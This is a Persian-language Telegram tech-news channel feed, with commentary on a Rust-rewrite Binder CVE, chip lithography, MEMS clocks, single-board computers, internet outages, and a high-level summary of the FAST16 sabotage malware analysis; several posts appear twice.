بریم برای کالبدشکافی CVE-2025-68260. ماجرا از این قراره که یه فایل مشخص تو Binder کرنل لینوکس سالها با C وجود داشته. یه کد C قدیمی، حوصلهسربر، محافظهکارانه، ولی درست! لاکها شاید کمی طولانیتر بودن، ولی قانونش خیلی ساده و سفت و سخت بوده: death_list همیشه زیر یه لاک واحد دستکاری میشد، مالکیتش هیچوقت مبهم نمیشد، و لیست از کنترل صاحبش خارج نمیشد. همین.
تا اینکه یه روز تصمیم گرفته میشه همین تیکه کد رو با فلسفهی «Rewrite it in Rust» بازنویسی کنن. نیت روی کاغذ خوبه: لاک کوتاهتر، کد تمیزتر، استفاده از Rust تو سطح کرنل، و طبیعتاً یه دور افتخار و کلی بوق.
تو پیادهسازی Rust، برای اینکه Borrow Checker راضی بشه و کد «Rusty» به نظر بیاد، تصمیم گرفته میشه که محتویات death_list رو موقتاً بکشن بیرون و بریزن تو یه لیست محلی، لاک رو رها کنن، بعد بیرون از لاک روش Iterate کنن.
روی کاغذ؟ عالی. لاک کوتاهتر شده.در عمل؟ یه قاعدهی همیشگی (Invariant) تاریخی Binder نابود شده.چیزی که تو نسخهی C اصلاً قابل تصور نبوده، نه بهخاطر امنیت C، بلکه بهخاطر «ذهنیت کرنلی» که میگفت لیست درونساختاری (Intrusive List) یا کاملاً مال لاکه، یا اصلاً وجود نداره. حد وسطی وجود نداشت. ولی تو نسخهی Rust، این Invariant تبدیل میشه به یه کامنت قشنگ بالای یه unsafe: «این نود یا تو همین لیسته یا هیچجا نیست.»
در حالی که دیگه درست نیست! نتیجه کاملاً قابل پیشبینیه: ایجاد Race Condition واقعی، دستکاری همزمان پوینترهای prev/next، فساد حافظه، کرش کرنل، و در نهایت یه CVE رسمی.
طنز تلخ ماجرا؟ همون فایل تو نسخهی C سالها بدون این داستانها کار کرده بوده. از نظر Performance هم داستان قشنگ نیست. نسخهی Rust اینجا نهتنها unsafe داره، بلکه Abstraction ،Indirection ،Refcounting و پیچیدگی هم اضافه کرده. یعنی هم سربار بیشتر، هم Reasoning سختتر. لاک کوتاهتر شده، ولی فهم کد سختتر شده! و تو کرنل این دقیقاً خلاف جهته.
مسئله اینه که Rust ابزار خوبیه، ولی وقتی یه کد کرنلی بالغ و Battle-tested رو بدون نیاز واقعی و بدون بازطراحی عمیق مدل همزمانی، صرفاً بازنویسی میکنی، احتمال اینکه بدترش کنی خیلی بالاست. مخصوصاً وقتی با Data Structureهای Intrusive و Invariantهای نانوشته سروکار داری.
از طرفی تو کرنل، کد Boring که سالها درست کار کرده، یه داراییه. بازنویسی فقط به این دلیل که «میشه با Rust نوشت»، فضیلت نیست! میتونه منبع Regression، پیچیدگی و باگ جدید باشه.
این قضیه برای ما تو دنیای امبدد یه زنگ خطر جدیتری هم داره. وقتی منابع محدودن و دیوایس قراره سالها تو فیلد بدون دسترسی فیزیکی کار کنه، «پیچیدگی» بزرگترین دشمنه. تو این سیستمها ما دنبال قطعیت (Determinism) و پیشبینیپذیری (Predictability) هستیم، نه Abstractionهایی که معلوم نیست اونزیر چه سرباری (Overhead) دارن.
اگه قراره Rust جایگزین C بشه، باید بتونه همون سادگی و کارایی Bare-metal رو بده، نه اینکه برای حل مشکل مموری که خودش هم میتونه به بار بیاره، مشکل معماری درست کنه. تو امبدد، کدی که «شاید» Race داشته باشه ولی ۱۰ لایه رپ (Wrap) شده، خیلی ترسناکتر از کد C لُختیه که دقیق میدونی بیتبهبیتش داره چیکار میکنه.
برای جزییات بیشتر اینجا رو بخونید.
📡openpcb
تا اینکه یه روز تصمیم گرفته میشه همین تیکه کد رو با فلسفهی «Rewrite it in Rust» بازنویسی کنن. نیت روی کاغذ خوبه: لاک کوتاهتر، کد تمیزتر، استفاده از Rust تو سطح کرنل، و طبیعتاً یه دور افتخار و کلی بوق.
تو پیادهسازی Rust، برای اینکه Borrow Checker راضی بشه و کد «Rusty» به نظر بیاد، تصمیم گرفته میشه که محتویات death_list رو موقتاً بکشن بیرون و بریزن تو یه لیست محلی، لاک رو رها کنن، بعد بیرون از لاک روش Iterate کنن.
روی کاغذ؟ عالی. لاک کوتاهتر شده.در عمل؟ یه قاعدهی همیشگی (Invariant) تاریخی Binder نابود شده.چیزی که تو نسخهی C اصلاً قابل تصور نبوده، نه بهخاطر امنیت C، بلکه بهخاطر «ذهنیت کرنلی» که میگفت لیست درونساختاری (Intrusive List) یا کاملاً مال لاکه، یا اصلاً وجود نداره. حد وسطی وجود نداشت. ولی تو نسخهی Rust، این Invariant تبدیل میشه به یه کامنت قشنگ بالای یه unsafe: «این نود یا تو همین لیسته یا هیچجا نیست.»
در حالی که دیگه درست نیست! نتیجه کاملاً قابل پیشبینیه: ایجاد Race Condition واقعی، دستکاری همزمان پوینترهای prev/next، فساد حافظه، کرش کرنل، و در نهایت یه CVE رسمی.
طنز تلخ ماجرا؟ همون فایل تو نسخهی C سالها بدون این داستانها کار کرده بوده. از نظر Performance هم داستان قشنگ نیست. نسخهی Rust اینجا نهتنها unsafe داره، بلکه Abstraction ،Indirection ،Refcounting و پیچیدگی هم اضافه کرده. یعنی هم سربار بیشتر، هم Reasoning سختتر. لاک کوتاهتر شده، ولی فهم کد سختتر شده! و تو کرنل این دقیقاً خلاف جهته.
مسئله اینه که Rust ابزار خوبیه، ولی وقتی یه کد کرنلی بالغ و Battle-tested رو بدون نیاز واقعی و بدون بازطراحی عمیق مدل همزمانی، صرفاً بازنویسی میکنی، احتمال اینکه بدترش کنی خیلی بالاست. مخصوصاً وقتی با Data Structureهای Intrusive و Invariantهای نانوشته سروکار داری.
از طرفی تو کرنل، کد Boring که سالها درست کار کرده، یه داراییه. بازنویسی فقط به این دلیل که «میشه با Rust نوشت»، فضیلت نیست! میتونه منبع Regression، پیچیدگی و باگ جدید باشه.
این قضیه برای ما تو دنیای امبدد یه زنگ خطر جدیتری هم داره. وقتی منابع محدودن و دیوایس قراره سالها تو فیلد بدون دسترسی فیزیکی کار کنه، «پیچیدگی» بزرگترین دشمنه. تو این سیستمها ما دنبال قطعیت (Determinism) و پیشبینیپذیری (Predictability) هستیم، نه Abstractionهایی که معلوم نیست اونزیر چه سرباری (Overhead) دارن.
اگه قراره Rust جایگزین C بشه، باید بتونه همون سادگی و کارایی Bare-metal رو بده، نه اینکه برای حل مشکل مموری که خودش هم میتونه به بار بیاره، مشکل معماری درست کنه. تو امبدد، کدی که «شاید» Race داشته باشه ولی ۱۰ لایه رپ (Wrap) شده، خیلی ترسناکتر از کد C لُختیه که دقیق میدونی بیتبهبیتش داره چیکار میکنه.
برای جزییات بیشتر اینجا رو بخونید.
📡openpcb
👍48❤11👏6
یه تیم تحقیقاتی تو MIT یه ربات پرنده ساخته که سرعت پروازش در حد زنبور عسله و در آینده میتونه به درد عملیات جستوجو و نجات بخوره.
اندازه این ربات حدود ۴ سانتیمتره و وزنش هم کمتر از یه گرمه. بهخاطر همین میتونه از جاهای خیلی تنگ رد بشه و مثلاً بعد از زلزله، لابهلای آوار بره و اگه آدم زندهای اون زیر باشه، به تیمهای امداد خبر بده.
کوین چن، استاد برق و کامپیوتر MIT و یکی از نویسندههای مقاله، میگه این نوع رباتها میتونن برای بازرسی جاهای تنگ مثل داخل توربینها هم استفاده بشن، یا حتی تو مزارع عمودی به گردهافشانی کمک کنن.
سالهاست که میکرورباتها رو برای محیطهایی که برای انسان خطرناک یا غیرقابل دسترسه بررسیت میکنن. بعضیها مثل سوسک میخزن، بعضیها مثل یه حشره فنری میپرن. ولی مشکل مشترکشون این بوده که خیلی ظریف و شکنندهان، کنترلشون سخته و با یه جریان هوای غیرقابل پیشبینی نامتعادل میشن.
برای کنترل این ربات از یه مدل یادگیری عمیق که رفتار ربات رو «پیشبینی» میکنه و بهترین توالی حرکتها رو برای دنبال کردن یه مسیر امن میچینه استفاده کردن. یعنی ربات بهجای دستورهای ثابت و از پیشنوشتهشده یاد میگیره تو شرایط مختلف چطور حرکت میکنه و همون لحظه بالها رو تنظیم میکنه تا پایدار بمونه و از مسیر خارج نشه.
این ربات تونسته تو ۱۱ ثانیه ۱۰ تا پشتک هوایی پشتسرهم بزنه، اون هم تو شرایط بادی، پشتک یه نمونهی خوب و از سختترین مانورهاست. اگه یه ربات بتونه پشتک بزنه، یعنی میتونه خیلی سریع تغییر جهت بده و این برای مقابله با تندبادهای لحظهای خیلی مهمه.
این تیم حسابی آیرودینامیک بالزدن حشرات رو بررسی کردن تا حرکت بال مگسها و زنبورها رو تقلید کنن. نتیجهاش رباتیه که ۳۳۰ بار در ثانیه بال میزنه تقریباً همردهی زنبور عسل واقعی.
متن خبر رو میتونید اینجا بخونید.
📡openpcb
اندازه این ربات حدود ۴ سانتیمتره و وزنش هم کمتر از یه گرمه. بهخاطر همین میتونه از جاهای خیلی تنگ رد بشه و مثلاً بعد از زلزله، لابهلای آوار بره و اگه آدم زندهای اون زیر باشه، به تیمهای امداد خبر بده.
کوین چن، استاد برق و کامپیوتر MIT و یکی از نویسندههای مقاله، میگه این نوع رباتها میتونن برای بازرسی جاهای تنگ مثل داخل توربینها هم استفاده بشن، یا حتی تو مزارع عمودی به گردهافشانی کمک کنن.
سالهاست که میکرورباتها رو برای محیطهایی که برای انسان خطرناک یا غیرقابل دسترسه بررسیت میکنن. بعضیها مثل سوسک میخزن، بعضیها مثل یه حشره فنری میپرن. ولی مشکل مشترکشون این بوده که خیلی ظریف و شکنندهان، کنترلشون سخته و با یه جریان هوای غیرقابل پیشبینی نامتعادل میشن.
برای کنترل این ربات از یه مدل یادگیری عمیق که رفتار ربات رو «پیشبینی» میکنه و بهترین توالی حرکتها رو برای دنبال کردن یه مسیر امن میچینه استفاده کردن. یعنی ربات بهجای دستورهای ثابت و از پیشنوشتهشده یاد میگیره تو شرایط مختلف چطور حرکت میکنه و همون لحظه بالها رو تنظیم میکنه تا پایدار بمونه و از مسیر خارج نشه.
این ربات تونسته تو ۱۱ ثانیه ۱۰ تا پشتک هوایی پشتسرهم بزنه، اون هم تو شرایط بادی، پشتک یه نمونهی خوب و از سختترین مانورهاست. اگه یه ربات بتونه پشتک بزنه، یعنی میتونه خیلی سریع تغییر جهت بده و این برای مقابله با تندبادهای لحظهای خیلی مهمه.
این تیم حسابی آیرودینامیک بالزدن حشرات رو بررسی کردن تا حرکت بال مگسها و زنبورها رو تقلید کنن. نتیجهاش رباتیه که ۳۳۰ بار در ثانیه بال میزنه تقریباً همردهی زنبور عسل واقعی.
متن خبر رو میتونید اینجا بخونید.
📡openpcb
❤26🔥17👍7
چند روزیه تو اخبار تکنولوژی گفته میشه که چین نمونه اولیه دستگاه لیتوگرافی EUV را ساخته و اون رو کنار محصولات ASML قرار میدن! ولی اصل ماجرا اینه که ما با یه کپی مهندسی معکوس شده از دستگاههای کامپکت Twinscan NXE هلندی طرف نیستیم، بلکه خروجی "پروژه منهتن" که توی شنژنه بیشتر یه تأسیسات عظیمه شبیه یه کارخونه(چیزی شبیه تصویر بالا که یکی از Synchrotronهای چینیه) تا یه دستگاه اندازه اتوبوس داخل کلینروم.
چینیها چون به زنجیره تأمین قطعات اپتیک و لیزرهای خاص ASML دسترسی نداشتن، مسیر فیزیک رو عوض کردن و به جای متد LPP که لیزر به قطرات مذاب شناور قلع شلیک میشه، رفتن سراغ تکنولوژی SSMB یا یه سینکروترون (Synchrotron) خیلی بزرگ که بتونن نور ۱۳.۵ نانومتری رو با توان بالا ولی در ابعاد یک کارخونه تولید کنن، در نتیجه الان گلوگاه فیزیک پلاسما و تولید فوتون رو شکستن ولی با ابعاد خیلی خیلی عظیم البته با بازدهی تولید خیلی پایین.
در واقع چیزی که الان داره جور صنعت چیپ چین رو میکشه و بهشون خروجی ۵ نانومتری میده، این دستگاه جدید نیست، بلکه فشار آوردن روی لیتوگرافی DUV با دستگاههای داخلی مثل سری SSA800 و استفاده از تکنیکهای کثیف مهندسی ولی موثر SAQP (Self-Aligned Quadruple Patterning) هست که توش ویفر رو ۴ بار اکسپوز میکنن! این روش سرعت تولید رو پایین میاره و مدیریت Overlay Error توش کابوسه، ولی عملاً تحریم رو دور زده و نشون میده که چین حتی با هزینه بالاتر و پروسه کندتر، به استقلال تو لایههای حساس سیلیکون رسیده که نهایتاً سرریز این تکنولوژی باعث میشه تو نودهای پایینتر دستشون بازتر بشه.
📡openpcb
چینیها چون به زنجیره تأمین قطعات اپتیک و لیزرهای خاص ASML دسترسی نداشتن، مسیر فیزیک رو عوض کردن و به جای متد LPP که لیزر به قطرات مذاب شناور قلع شلیک میشه، رفتن سراغ تکنولوژی SSMB یا یه سینکروترون (Synchrotron) خیلی بزرگ که بتونن نور ۱۳.۵ نانومتری رو با توان بالا ولی در ابعاد یک کارخونه تولید کنن، در نتیجه الان گلوگاه فیزیک پلاسما و تولید فوتون رو شکستن ولی با ابعاد خیلی خیلی عظیم البته با بازدهی تولید خیلی پایین.
در واقع چیزی که الان داره جور صنعت چیپ چین رو میکشه و بهشون خروجی ۵ نانومتری میده، این دستگاه جدید نیست، بلکه فشار آوردن روی لیتوگرافی DUV با دستگاههای داخلی مثل سری SSA800 و استفاده از تکنیکهای کثیف مهندسی ولی موثر SAQP (Self-Aligned Quadruple Patterning) هست که توش ویفر رو ۴ بار اکسپوز میکنن! این روش سرعت تولید رو پایین میاره و مدیریت Overlay Error توش کابوسه، ولی عملاً تحریم رو دور زده و نشون میده که چین حتی با هزینه بالاتر و پروسه کندتر، به استقلال تو لایههای حساس سیلیکون رسیده که نهایتاً سرریز این تکنولوژی باعث میشه تو نودهای پایینتر دستشون بازتر بشه.
📡openpcb
❤48👍28❤🔥6
چند محقق از دانشگاههای فلوریدا و میشیگان، که دو نفرشون هم ایرانی هستن، نتایج تحقیقاتی رو منتشر کردن که احتمالاً قراره معماری تایمینگ تو سیستمهای الکترونیکی رو حسابی تغییر بده. روزبه تبریزیان و بنفشه جباری روی پروژهای کار میکنن که هدفش ساخت یه کلاک MEMS با دقتی نزدیک به ساعتهای اتمیه، اما با فوتپرینت و مصرف توانی که بشه واقعاً تو گوشی یا نودهای IoT ازش استفاده کرد.
داستان از یه پروژهی DARPA شروع شده با یه هدف سنگین کلاکی که تو یک هفته کار مداوم، فقط ۱ میکروثانیه دریفت داشته باشه.
نکتهی فنی جذاب کارشون اینه که برعکس راهکارهای فعلی بازار (مثل چیپهای SiTime) که با طراحی سیستم پیچیده و مدارهای جبرانساز سعی میکنن خطای رزوناتور رو مهار کنن، این تیم رفته سراغ خود فیزیک پایه. تمرکزشون روی Super-doped Silicon برای ساخت رزوناتوریه که ذاتاً پایدار باشه و بدون لایههای پرمصرف و پیچیدهی compensation، نویز فاز پایین و پایداری فرکانسی بالا بده.
اهمیت این ماجرا وقتی پررنگ میشه که GPS در دسترس نباشه. امروز تو سناریوهای deep-space یا زیر آب، مجبوریم سراغ CSACها بریم! ساعتهایی که هم گرونن هم پرمصرف. اگه این شیوه به بلوغ برسه، میتونه دقیقاً فاصلهی بین کریستالهای معمولی و ساعتهای اتمی رو پر کنه.
البته هنوز چالشهایی وجود داره، از جمله رفتار سیلیکون دوپشده در بازههای زمانی طولانی و بحث diffusion متریال. ولی اگه این تکنولوژی به نتیجه برسه، برای کسایی که با پروتکلهای time-sensitive مثل LoRaWAN Class B/C یا 5G کار میکنن، یعنی دقت تایم بالا بدون وابستگی دائمی به سینک شبک و عملاً وقتی دریفت کلاک اینقدر پایین باشه، میتونیم پنجرههای RX رو خیلی کوتاهتر در نظر بگیریم و گارد تایم رو به حداقل برسونیم.
این یعنی دیوایس میتونه مدت طولانیتری توی Deep Sleep بمونه بدون اینکه نگران از دست دادن Beacon شبکه یا خارج شدن از سینک باشه. واسه یه نود که قراره ۱۰ سال با یه باتری سکهای کار کنه، این پایداری فیزیکی فقط یه فیچر لوکس نیست, دقیقاً همون فاکتوریه که بودجه توان کل سیستم رو نجات میده و اجازه میده دیوتیسایکل رو تا حد ممکن پایین نگه داریم.
منبع
📡openpcb
داستان از یه پروژهی DARPA شروع شده با یه هدف سنگین کلاکی که تو یک هفته کار مداوم، فقط ۱ میکروثانیه دریفت داشته باشه.
نکتهی فنی جذاب کارشون اینه که برعکس راهکارهای فعلی بازار (مثل چیپهای SiTime) که با طراحی سیستم پیچیده و مدارهای جبرانساز سعی میکنن خطای رزوناتور رو مهار کنن، این تیم رفته سراغ خود فیزیک پایه. تمرکزشون روی Super-doped Silicon برای ساخت رزوناتوریه که ذاتاً پایدار باشه و بدون لایههای پرمصرف و پیچیدهی compensation، نویز فاز پایین و پایداری فرکانسی بالا بده.
اهمیت این ماجرا وقتی پررنگ میشه که GPS در دسترس نباشه. امروز تو سناریوهای deep-space یا زیر آب، مجبوریم سراغ CSACها بریم! ساعتهایی که هم گرونن هم پرمصرف. اگه این شیوه به بلوغ برسه، میتونه دقیقاً فاصلهی بین کریستالهای معمولی و ساعتهای اتمی رو پر کنه.
البته هنوز چالشهایی وجود داره، از جمله رفتار سیلیکون دوپشده در بازههای زمانی طولانی و بحث diffusion متریال. ولی اگه این تکنولوژی به نتیجه برسه، برای کسایی که با پروتکلهای time-sensitive مثل LoRaWAN Class B/C یا 5G کار میکنن، یعنی دقت تایم بالا بدون وابستگی دائمی به سینک شبک و عملاً وقتی دریفت کلاک اینقدر پایین باشه، میتونیم پنجرههای RX رو خیلی کوتاهتر در نظر بگیریم و گارد تایم رو به حداقل برسونیم.
این یعنی دیوایس میتونه مدت طولانیتری توی Deep Sleep بمونه بدون اینکه نگران از دست دادن Beacon شبکه یا خارج شدن از سینک باشه. واسه یه نود که قراره ۱۰ سال با یه باتری سکهای کار کنه، این پایداری فیزیکی فقط یه فیچر لوکس نیست, دقیقاً همون فاکتوریه که بودجه توان کل سیستم رو نجات میده و اجازه میده دیوتیسایکل رو تا حد ممکن پایین نگه داریم.
منبع
📡openpcb
🔥56❤14👍12
شرکت Orange Pi با معرفی SBC جدیدش AI Station که از SoC هوآوی مدل Ascend 310 استفاده میکنه، عملاً Raspberry Pi 5 رو توی بحث پرفورمنس گوشه رینگ برده. این برد با پردازنده ۱۶هستهای ۱.۹ گیگاهرتزی و ۸ هسته وکتور، توی کلاس خودش یه غول به حساب میاد. نکته اصلی ماجرا NPU این چیپه که ۱۰ هسته مخصوص AI داره و خروجی ۱۷۶ TOPS رو ارائه میده که برای تسکهای استنتاجی (inference) سنگین روی Edge فوقالعادهست.
این برد تا ۹۶ گیگابایت رم پشتیبانی میکنه، که اون رو از سطح پروژههای کوچیک IoT فراتر برده و وارد فضای دیتاسنترهای لوکال و پردازش تصویر realtime کرده. در مقام مقایسه، رزبری پای ۵ با معماری Cortex-A76 و رم محدود، اصلاً توان رقابت با پهنای باند و قدرت پردازشی این برد رو نداره. این سختافزار برای سیستمهایی که نیاز به پردازش محلی سنگین دارن و نمیخوان به کلاود متکی باشن، یه گزینهی بیرقیبه.
معماری داخلی و تعداد بالای هستههای AI اجازه میده مدلهای زبانی یا بینایی ماشین با تاخیر بسیار کم اجرا بشن. Orange Pi با این حرکت نشون داد که داره مستقیم بازار High-end SBC و Mini PCهای صنعتی رو هدف میگیره. قیمت و تاریخ عرضهش هنوز مشخص نیست با این حال جزییات بیشتر این برد رو میتونید اینجا ببینید.
📡openpcb
این برد تا ۹۶ گیگابایت رم پشتیبانی میکنه، که اون رو از سطح پروژههای کوچیک IoT فراتر برده و وارد فضای دیتاسنترهای لوکال و پردازش تصویر realtime کرده. در مقام مقایسه، رزبری پای ۵ با معماری Cortex-A76 و رم محدود، اصلاً توان رقابت با پهنای باند و قدرت پردازشی این برد رو نداره. این سختافزار برای سیستمهایی که نیاز به پردازش محلی سنگین دارن و نمیخوان به کلاود متکی باشن، یه گزینهی بیرقیبه.
معماری داخلی و تعداد بالای هستههای AI اجازه میده مدلهای زبانی یا بینایی ماشین با تاخیر بسیار کم اجرا بشن. Orange Pi با این حرکت نشون داد که داره مستقیم بازار High-end SBC و Mini PCهای صنعتی رو هدف میگیره. قیمت و تاریخ عرضهش هنوز مشخص نیست با این حال جزییات بیشتر این برد رو میتونید اینجا ببینید.
📡openpcb
1❤23🔥12👍5
Forwarded from TechTube 𝕏 تک توب
شرکت Cloudflare گفته با اینکه طی دو روز گذشته ارتباط اینترنت کشور با سرورهای کلادفلر برقرار شده ولی ترافیک مصرفی همچنان به ترافیک قبل از قطعی نرسیده و الگوی اتصال هم نامنظم هست که نشون دهنده تدوام اختلال و قطعی روی اینترنت کشوره.
🔎 CloudflareRadar
📍 @TechTube
🔎 CloudflareRadar
📍 @TechTube
👍15👻1
ویدئوی کوتاهی از کالبدشکافی پهپاد انتحاری Prince Oleg روسی که شباهت ظاهری زیادی به پهپادهای شناسایی معروف اوکراینی مثل Valkyrie و Fury داره، منتشر شده که نکته قابل توجهش استفاده روسها از کامپیوتر تکبردی NanoPi NEO Core توی این پهپاده، علاوه بر این کل بدنه این پهپاد با پرینتر سهبعدی ساخته شده.
📡openpcb
📡openpcb
1👍40🔥2👎1
Forwarded from TechTube 𝕏 تک توب
بعد از تقریبا دو ماه از دستگیری رئیسجمهور ونزوئلا، شرکت SpaceX فروش رسمی استارلینک رو در ونزوئلا شروع کرده.
تا پیش از این مردم این کشور برای دسترسی به استارلینک باید دیشهای اون رو از بازار سیاه میخریدن و از اشتراک گرونتر Roam استفاده میکردن.
ولی حالا با شروع فروش رسمی این سرویس، کاربران امکان خرید دیشهای اون رو از نمایندگیهای مختلف SpaceX دارن و اشتراک ارزونتر Residential هم برای اونها در دسترس هست که در حال حاضر با 50 درصد تخفیف قابل خریداری و فعالسازی هست.
🔎 pcmag
📍 @TechTube
تا پیش از این مردم این کشور برای دسترسی به استارلینک باید دیشهای اون رو از بازار سیاه میخریدن و از اشتراک گرونتر Roam استفاده میکردن.
ولی حالا با شروع فروش رسمی این سرویس، کاربران امکان خرید دیشهای اون رو از نمایندگیهای مختلف SpaceX دارن و اشتراک ارزونتر Residential هم برای اونها در دسترس هست که در حال حاضر با 50 درصد تخفیف قابل خریداری و فعالسازی هست.
🔎 pcmag
📍 @TechTube
❤52🤮26😁3
Forwarded from TechTube 𝕏 تک توب
در حالی که اینترنت ما بیش از 42 روز هست که قطعه، دولت کره جنوبی اپراتورهای موبایل رو موظف کرده که به تمام مشترکانشون اینترنت رایگان با ترافیک بی نهایت با سرعت 400 کیلوبیت بر ثانیه رو ارائه بدن.
بدین صورت افرادی که بسته اونها تمام میشه، به جای قطع اینترنت، به اینترنتی با سرعت کم دسترسی خواهند داشت تا نیازهای اولیه اونها مثل ارسال پیام و غیره رو براورده کنه.
بیش از 7 میلیون مشترک از مزایای این طرح جدید بهره مند خواهند شد و سالانه بیش از 200 میلیون دلار در هزینه های اونها صرفه جویی خواهد کرد.
🔎 theregister
📍 @TechTube
بدین صورت افرادی که بسته اونها تمام میشه، به جای قطع اینترنت، به اینترنتی با سرعت کم دسترسی خواهند داشت تا نیازهای اولیه اونها مثل ارسال پیام و غیره رو براورده کنه.
بیش از 7 میلیون مشترک از مزایای این طرح جدید بهره مند خواهند شد و سالانه بیش از 200 میلیون دلار در هزینه های اونها صرفه جویی خواهد کرد.
🔎 theregister
📍 @TechTube
🤬13💔7😁1
طنز تلخ ماجرا اینجاست که مدیرعامل انجمن نرمافزارهای آزاد و متنباز، یعنی کسی که ماهیتا باید مدافع جریان آزاد اطلاعات، شفافیت و دسترسی بدون محدودیت به تکنولوژی و اینترنت باشه، نه کسی که تئوری توطئه انفجار گوشی و اینترنتهراسی رو پمپاژ میکنه. طرف به جای اینکه روی ممیزی امنیتی پروژههای اپنسورس، توسعه زیرساختهای غیرمتمرکز و ارتباط با کامیونیتی جهانی تمرکز کنه، داره دقیقا ادبیات نهادهای امنیتی رو برای توجیه فیلترینگ و قطع اینترنت میلیونها نفر و ایزوله کردن شبکه تکرار میکنه.
وقتی بالاترین مقام کامیونیتی FOSS تو یک کشور الفبای تکنولوژی و امنیت سایبری رو فدای پروپاگاندا میکنه و نت جهانی رو صرفا ابزار کشتار میبینه، عمق فاجعه و دلیل عقبموندگی زیرساختهای نرمافزاری و مرگ تدریجی اکوسیستم تک کشور کاملا مشخص میشه.
وقتی بالاترین مقام کامیونیتی FOSS تو یک کشور الفبای تکنولوژی و امنیت سایبری رو فدای پروپاگاندا میکنه و نت جهانی رو صرفا ابزار کشتار میبینه، عمق فاجعه و دلیل عقبموندگی زیرساختهای نرمافزاری و مرگ تدریجی اکوسیستم تک کشور کاملا مشخص میشه.
1👍51💩10🥱2
محققهای SentinelLABS یه بدافزار خیلی قدیمی و عجیب به اسم FAST16 رو پیدا کردن که دیپلوی اون برمیگرده به سال ۲۰۰۵، یعنی دقیقا پنج سال قبل از استاکسنت، و عملا اولین عملیات خرابکارانه نرمافزاری با دقت بالا تو تاریخ حملات سایبری به حساب میاد.
معماری این بدافزار دو تا کامپوننت اصلی داره، اولی یه Carrier به اسم svcmgmt.exe هست که یه ماشین مجازی Lua رو تو خودش امبد کرده و مثل یه کرم از طریق شبکه و سرویسهای ویندوز بین سیستمهای شبکه پخش میشه، فایلها رو کپی میکنه و اسکریپتهای Lua رو ران میکنه. بخش دوم یه Kernel Driver به اسم fast16.sys هست که تو سطح کرنل ویندوزهای ۲۰۰۰ و XP میشینه و مستقیما کد اجرایی نرمافزار هدف رو تو حافظه دستکاری میکنه. مکانیزمش اینطوریه که فقط دنبال باینریهایی میگرده که با کامپایلر Intel C/C++ بیلد شده باشن و اینو از روی اسم فایل و یه استرینگ خاص تو هدر PE چک میکنه. وقتی نرمافزار هدف اجرا میشه، درایور با استفاده از ۱۰۱ تا قانون خاص، سکشنهای xdata. و pdata. رو دستکاری میکنه و دستورات FPU رو تغییر میده تا محاسبات floating-point رو نامحسوس خراب کنه.
این یعنی تو برنامههایی مثل شبیهسازیهای فیزیک، مهندسی عمران، رمزنگاری یا تحقیقات هستهای(که انگار هدف اصلی همین بوده)، نتایج محاسبات به صورت سیستماتیک دستکاری و تحریف میشن، بدون اینکه برنامه کرش کنه یا یوزر متوجه اشتباه بودن و غیر طبیعی بودن نتایج بشه، که خیلی با رویکرد استاکسنت که مستقیما PLC ها رو هدف قرار میداد، فرق داره.
از اهداف احتمالی که تحلیل شدن میشه به نرمافزارهای LS-DYNA 970 برای شبیهسازی انفجار که تو برنامه آماد ایران کاربرد داشته، PKPM برای مهندسی سازه تو چین و MOHID برای مدلسازی هیدرودینامیک اشاره کرد.
لینک شدن این بدافزار به NSA و Shadow Brokers از اونجا میاد که اسم fast16 دقیقا تو لیست درایورهای لیک شده سال ۲۰۱۷ تحت عنوان drv_list.txt وجود داشت و جلوش به عنوان یه deconfliction signature نوشته شده بود که کاری بهش نداشته باشین تا اپراتورهای خودی باهاش تداخل پیدا نکنن، و مچ شدن PDB path تو خود بدافزار هم این ارتباط رو کاملا تایید میکنه.
از نظر تاریخی این بدافزار که تقریبا کشفنشده مونده بود نشون میده که از اواسط دهه ۲۰۰۰، یه سازمان دولتی تو لول NSA این قابلیت رو داشته که محاسبات پیچیده و حساس علمی و هستهای کشورهای دیگه رو در خفا و کاملا بیسروصدا دستکاری و خراب کنه.
مقاله اصلی رو میتونید اینجا بخونید.
📡openpcb
معماری این بدافزار دو تا کامپوننت اصلی داره، اولی یه Carrier به اسم svcmgmt.exe هست که یه ماشین مجازی Lua رو تو خودش امبد کرده و مثل یه کرم از طریق شبکه و سرویسهای ویندوز بین سیستمهای شبکه پخش میشه، فایلها رو کپی میکنه و اسکریپتهای Lua رو ران میکنه. بخش دوم یه Kernel Driver به اسم fast16.sys هست که تو سطح کرنل ویندوزهای ۲۰۰۰ و XP میشینه و مستقیما کد اجرایی نرمافزار هدف رو تو حافظه دستکاری میکنه. مکانیزمش اینطوریه که فقط دنبال باینریهایی میگرده که با کامپایلر Intel C/C++ بیلد شده باشن و اینو از روی اسم فایل و یه استرینگ خاص تو هدر PE چک میکنه. وقتی نرمافزار هدف اجرا میشه، درایور با استفاده از ۱۰۱ تا قانون خاص، سکشنهای xdata. و pdata. رو دستکاری میکنه و دستورات FPU رو تغییر میده تا محاسبات floating-point رو نامحسوس خراب کنه.
این یعنی تو برنامههایی مثل شبیهسازیهای فیزیک، مهندسی عمران، رمزنگاری یا تحقیقات هستهای(که انگار هدف اصلی همین بوده)، نتایج محاسبات به صورت سیستماتیک دستکاری و تحریف میشن، بدون اینکه برنامه کرش کنه یا یوزر متوجه اشتباه بودن و غیر طبیعی بودن نتایج بشه، که خیلی با رویکرد استاکسنت که مستقیما PLC ها رو هدف قرار میداد، فرق داره.
از اهداف احتمالی که تحلیل شدن میشه به نرمافزارهای LS-DYNA 970 برای شبیهسازی انفجار که تو برنامه آماد ایران کاربرد داشته، PKPM برای مهندسی سازه تو چین و MOHID برای مدلسازی هیدرودینامیک اشاره کرد.
لینک شدن این بدافزار به NSA و Shadow Brokers از اونجا میاد که اسم fast16 دقیقا تو لیست درایورهای لیک شده سال ۲۰۱۷ تحت عنوان drv_list.txt وجود داشت و جلوش به عنوان یه deconfliction signature نوشته شده بود که کاری بهش نداشته باشین تا اپراتورهای خودی باهاش تداخل پیدا نکنن، و مچ شدن PDB path تو خود بدافزار هم این ارتباط رو کاملا تایید میکنه.
از نظر تاریخی این بدافزار که تقریبا کشفنشده مونده بود نشون میده که از اواسط دهه ۲۰۰۰، یه سازمان دولتی تو لول NSA این قابلیت رو داشته که محاسبات پیچیده و حساس علمی و هستهای کشورهای دیگه رو در خفا و کاملا بیسروصدا دستکاری و خراب کنه.
مقاله اصلی رو میتونید اینجا بخونید.
📡openpcb
23🤯33👍11❤8
Forwarded from TechTube 𝕏 تک توب
